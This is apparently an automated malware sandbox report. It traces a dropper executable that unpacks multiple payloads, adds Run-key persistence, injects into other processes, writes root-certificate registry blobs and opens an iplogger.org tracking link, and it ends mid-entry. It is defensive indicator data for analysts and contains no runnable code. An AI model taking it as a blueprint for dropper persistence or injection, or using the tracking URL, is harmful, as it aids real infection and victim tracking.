1835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Weather Installation.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	Weather Installation.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	GameBoxWin64.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	136	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	139	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeWerFault.exey_b0wCZGcPi6yl3YyF3GVSz5.exeCleaner Installation.exeidentity_helper.exeInstallation.exeys8YRG5UgmpkjNZexReC2Xbd.exeAzRQxmcTqX_2X8NQkYpru4an.exeanyname.exeWerFault.exeWerFault.exe

pid	process
4252	msedge.exe
4252	msedge.exe
5436	msedge.exe
5436	msedge.exe
2228	WerFault.exe
2228	WerFault.exe
2420	y_b0wCZGcPi6yl3YyF3GVSz5.exe
2420	y_b0wCZGcPi6yl3YyF3GVSz5.exe
5856	Cleaner Installation.exe
5856	Cleaner Installation.exe
2440	identity_helper.exe
2440	identity_helper.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
1172	Installation.exe
6840	ys8YRG5UgmpkjNZexReC2Xbd.exe
6840	ys8YRG5UgmpkjNZexReC2Xbd.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
7132	anyname.exe
7132	anyname.exe
2084	WerFault.exe
2084	WerFault.exe
1992	WerFault.exe
1992	WerFault.exe
3120
3120
3120
3120
3120
3120
3120
3120

Suspicious behavior: MapViewOfSection 37 IoCs

Processes:

ys8YRG5UgmpkjNZexReC2Xbd.exeexplorer.exe

pid	process
6840	ys8YRG5UgmpkjNZexReC2Xbd.exe
3120
3120
3120
3120
3120
3120
3120
3120
5204	explorer.exe
5204	explorer.exe
5204	explorer.exe
5204	explorer.exe
3120
3120
5204	explorer.exe
5204	explorer.exe
5204	explorer.exe
5204	explorer.exe
3120
3120
5204	explorer.exe
5204	explorer.exe
5204	explorer.exe
5204	explorer.exe
3120
3120
5204	explorer.exe
5204	explorer.exe
5204	explorer.exe
5204	explorer.exe
3120
3120
5204	explorer.exe
5204	explorer.exe
3120
3120

Suspicious behavior: SetClipboardViewer 2 IoCs

Processes:

4628016.exe4395099.exe

pid process

5076 4628016.exe
4380 4395099.exe

pid	process
5076	4628016.exe
4380	4395099.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SystemSettings.exeKRSetp.exe1470615.exe8607405.exeCleaner Installation.exeWerFault.exesvchost.exeuhlMvjiM_cFKqG2sa1Chga1X.exeS47rYlKP5jCrGkLBNX4aJRHK.exe2533838.exeNMtYBWQ61pYznbqVoJMOaC6c.exeB9O6bq19rea6BpyKuUJzYQ6Q.exe5413231.exeduZ8PiCmHX783JGssa2_JrDB.exeJY94WQQaT7F9U5WW77kIxPEF.exe5831941.exey_b0wCZGcPi6yl3YyF3GVSz5.exe6442635.exe7315424.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	4132	SystemSettings.exe
Token: SeCreatePagefilePrivilege	4132	SystemSettings.exe
Token: SeShutdownPrivilege	4132	SystemSettings.exe
Token: SeCreatePagefilePrivilege	4132	SystemSettings.exe
Token: SeShutdownPrivilege	4132	SystemSettings.exe
Token: SeCreatePagefilePrivilege	4132	SystemSettings.exe
Token: SeDebugPrivilege	3696	KRSetp.exe
Token: SeShutdownPrivilege	4132	SystemSettings.exe
Token: SeCreatePagefilePrivilege	4132	SystemSettings.exe
Token: SeDebugPrivilege	5676	1470615.exe
Token: SeDebugPrivilege	5916	8607405.exe
Token: SeDebugPrivilege	5856	Cleaner Installation.exe
Token: SeRestorePrivilege	2228	WerFault.exe
Token: SeBackupPrivilege	2228	WerFault.exe
Token: SeBackupPrivilege	2228	WerFault.exe
Token: SeShutdownPrivilege	4132	SystemSettings.exe
Token: SeCreatePagefilePrivilege	4132	SystemSettings.exe
Token: SeTcbPrivilege	5812	svchost.exe
Token: SeTcbPrivilege	5812	svchost.exe
Token: SeTcbPrivilege	5812	svchost.exe
Token: SeTcbPrivilege	5812	svchost.exe
Token: SeTcbPrivilege	5812	svchost.exe
Token: SeTcbPrivilege	5812	svchost.exe
Token: SeDebugPrivilege	3720	uhlMvjiM_cFKqG2sa1Chga1X.exe
Token: SeDebugPrivilege	6888	S47rYlKP5jCrGkLBNX4aJRHK.exe
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeDebugPrivilege	4476	2533838.exe
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeDebugPrivilege	6504	NMtYBWQ61pYznbqVoJMOaC6c.exe
Token: SeDebugPrivilege	5748	B9O6bq19rea6BpyKuUJzYQ6Q.exe
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeDebugPrivilege	7036	5413231.exe
Token: SeDebugPrivilege	4692	duZ8PiCmHX783JGssa2_JrDB.exe
Token: SeDebugPrivilege	5256	JY94WQQaT7F9U5WW77kIxPEF.exe
Token: SeDebugPrivilege	5288	5831941.exe
Token: SeDebugPrivilege	4396	y_b0wCZGcPi6yl3YyF3GVSz5.exe
Token: SeDebugPrivilege	2940	6442635.exe
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeDebugPrivilege	5972	7315424.exe
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeDebugPrivilege	7076	powershell.exe
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120
Token: SeShutdownPrivilege	3120
Token: SeCreatePagefilePrivilege	3120

Suspicious use of FindShellTrayWindow 16 IoCs

Processes:

SystemSettings.exemsedge.exebodlAh1CVSDV9qX9YyeSQ3yC.tmpCleaner Installation.exeGameBoxWin64.exeWeather Installation.exeultramediaburner.tmpinstaller.exe

pid	process
4132	SystemSettings.exe
5436	msedge.exe
5436	msedge.exe
5436	msedge.exe
5436	msedge.exe
5436	msedge.exe
5436	msedge.exe
5436	msedge.exe
5436	msedge.exe
5436	msedge.exe
4512	bodlAh1CVSDV9qX9YyeSQ3yC.tmp
5856	Cleaner Installation.exe
5020	GameBoxWin64.exe
6808	Weather Installation.exe
4496	ultramediaburner.tmp
6488	installer.exe

Suspicious use of SendNotifyMessage 4 IoCs

Processes:

msedge.exe

pid process

5436 msedge.exe
5436 msedge.exe
5436 msedge.exe
5436 msedge.exe

pid	process
5436	msedge.exe
5436	msedge.exe
5436	msedge.exe
5436	msedge.exe

Suspicious use of SetWindowsHookEx 45 IoCs

Processes:

SystemSettings.exeInstallation.exewo2fMrz_7qjffU_x_shlqyk0.exenO03ABkh7hdqIUnSBO69uWWI.exeys8YRG5UgmpkjNZexReC2Xbd.exe3rNFvXzLXMlNFCvc32Oqh9Ch.exeexplorer.exexEL0UOsp9f5GdO130zgfqNJ8.exeOwOf1A4hkWQqEkrB13_paZa8.exefVqhXPVEa95IDkaUhXHBvgdO.exeAzRQxmcTqX_2X8NQkYpru4an.execustomer3.exemd8_8eus.exebodlAh1CVSDV9qX9YyeSQ3yC.exebodlAh1CVSDV9qX9YyeSQ3yC.tmp11111.exejfiag3g_gg.exe11111.exe11111.exe11111.exe11111.exe11111.exe11111.exejfiag3g_gg.exeSetup.exeMediaBurner2.exeaskinstall53.exeMediaBurner2.tmp22222.exezhangfei.exe22222.exeWerFault.exe22222.exe22222.exeultramediaburner.exeultramediaburner.tmpufgaa.exeanyname.exeanyname.exe11111.exe11111.exeD283.exe11111.exe11111.exesBf7se8pdHa7It2u292JAYsq.exe

pid	process
4132	SystemSettings.exe
1172	Installation.exe
5924	wo2fMrz_7qjffU_x_shlqyk0.exe
5328	nO03ABkh7hdqIUnSBO69uWWI.exe
5968	ys8YRG5UgmpkjNZexReC2Xbd.exe
496	3rNFvXzLXMlNFCvc32Oqh9Ch.exe
5204	explorer.exe
2344	xEL0UOsp9f5GdO130zgfqNJ8.exe
4136	OwOf1A4hkWQqEkrB13_paZa8.exe
5656	fVqhXPVEa95IDkaUhXHBvgdO.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
4808	customer3.exe
6512	md8_8eus.exe
6560	bodlAh1CVSDV9qX9YyeSQ3yC.exe
4512	bodlAh1CVSDV9qX9YyeSQ3yC.tmp
4700	11111.exe
6316	jfiag3g_gg.exe
6224	11111.exe
7024	11111.exe
1852	11111.exe
3924	11111.exe
6612	11111.exe
6044	11111.exe
1904	jfiag3g_gg.exe
3168	Setup.exe
5736	MediaBurner2.exe
7016	askinstall53.exe
2544	MediaBurner2.tmp
6572	22222.exe
5952	zhangfei.exe
5540	22222.exe
3932	WerFault.exe
7836	22222.exe
7956	22222.exe
5848	ultramediaburner.exe
4496	ultramediaburner.tmp
5896	ufgaa.exe
7132	anyname.exe
4868	anyname.exe
6456	11111.exe
3936	11111.exe
6592	D283.exe
5376	11111.exe
1564	11111.exe
6256	sBf7se8pdHa7It2u292JAYsq.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EB7233922891E1DAD0434FBD52623647.exeKRSetp.exemsedge.exeFolder.exe8746557.exe

description	pid	process	target process
PID 4608 wrote to memory of 3696	4608	EB7233922891E1DAD0434FBD52623647.exe	KRSetp.exe
PID 4608 wrote to memory of 3696	4608	EB7233922891E1DAD0434FBD52623647.exe	KRSetp.exe
PID 3696 wrote to memory of 5676	3696	KRSetp.exe	1470615.exe
PID 3696 wrote to memory of 5676	3696	KRSetp.exe	1470615.exe
PID 3696 wrote to memory of 5772	3696	KRSetp.exe	8746557.exe
PID 3696 wrote to memory of 5772	3696	KRSetp.exe	8746557.exe
PID 3696 wrote to memory of 5772	3696	KRSetp.exe	8746557.exe
PID 3696 wrote to memory of 5856	3696	KRSetp.exe	Cleaner Installation.exe
PID 3696 wrote to memory of 5856	3696	KRSetp.exe	Cleaner Installation.exe
PID 3696 wrote to memory of 5856	3696	KRSetp.exe	Cleaner Installation.exe
PID 3696 wrote to memory of 5916	3696	KRSetp.exe	8607405.exe
PID 3696 wrote to memory of 5916	3696	KRSetp.exe	8607405.exe
PID 3696 wrote to memory of 5916	3696	KRSetp.exe	8607405.exe
PID 4608 wrote to memory of 5436	4608	EB7233922891E1DAD0434FBD52623647.exe	msedge.exe
PID 4608 wrote to memory of 5436	4608	EB7233922891E1DAD0434FBD52623647.exe	msedge.exe
PID 4608 wrote to memory of 5528	4608	EB7233922891E1DAD0434FBD52623647.exe	Folder.exe
PID 4608 wrote to memory of 5528	4608	EB7233922891E1DAD0434FBD52623647.exe	Folder.exe
PID 4608 wrote to memory of 5528	4608	EB7233922891E1DAD0434FBD52623647.exe	Folder.exe
PID 5436 wrote to memory of 1192	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 1192	5436	msedge.exe	msedge.exe
PID 5528 wrote to memory of 2420	5528	Folder.exe	y_b0wCZGcPi6yl3YyF3GVSz5.exe
PID 5528 wrote to memory of 2420	5528	Folder.exe	y_b0wCZGcPi6yl3YyF3GVSz5.exe
PID 5528 wrote to memory of 2420	5528	Folder.exe	y_b0wCZGcPi6yl3YyF3GVSz5.exe
PID 5772 wrote to memory of 2444	5772	8746557.exe	WinHoster.exe
PID 5772 wrote to memory of 2444	5772	8746557.exe	WinHoster.exe
PID 5772 wrote to memory of 2444	5772	8746557.exe	WinHoster.exe
PID 4608 wrote to memory of 5968	4608	EB7233922891E1DAD0434FBD52623647.exe	ys8YRG5UgmpkjNZexReC2Xbd.exe
PID 4608 wrote to memory of 5968	4608	EB7233922891E1DAD0434FBD52623647.exe	ys8YRG5UgmpkjNZexReC2Xbd.exe
PID 4608 wrote to memory of 5968	4608	EB7233922891E1DAD0434FBD52623647.exe	ys8YRG5UgmpkjNZexReC2Xbd.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe
PID 5436 wrote to memory of 3912	5436	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe
"C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4608
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3696
- - C:\Users\Admin\AppData\Roaming\1470615.exe
    "C:\Users\Admin\AppData\Roaming\1470615.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5676
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 5676 -s 2360
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:5796
- - C:\Users\Admin\AppData\Roaming\8746557.exe
    "C:\Users\Admin\AppData\Roaming\8746557.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:5772
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      Executes dropped EXE
      PID:2444
- - C:\Users\Admin\AppData\Roaming\1331462.exe
    "C:\Users\Admin\AppData\Roaming\1331462.exe"
    3⤵
    PID:5856
- - C:\Users\Admin\AppData\Roaming\8607405.exe
    "C:\Users\Admin\AppData\Roaming\8607405.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5916
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 1556
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/19Pfw7
  2⤵
  - Adds Run key to start application
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:5436
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x84,0xe4,0x108,0x80,0x10c,0x7ffef2fe46f8,0x7ffef2fe4708,0x7ffef2fe4718
    3⤵
    PID:1192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
    3⤵
    PID:3912
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4252
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
    3⤵
    PID:556
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,13609043222537754452,17358886152165506414,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
    3⤵
    PID:5868
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
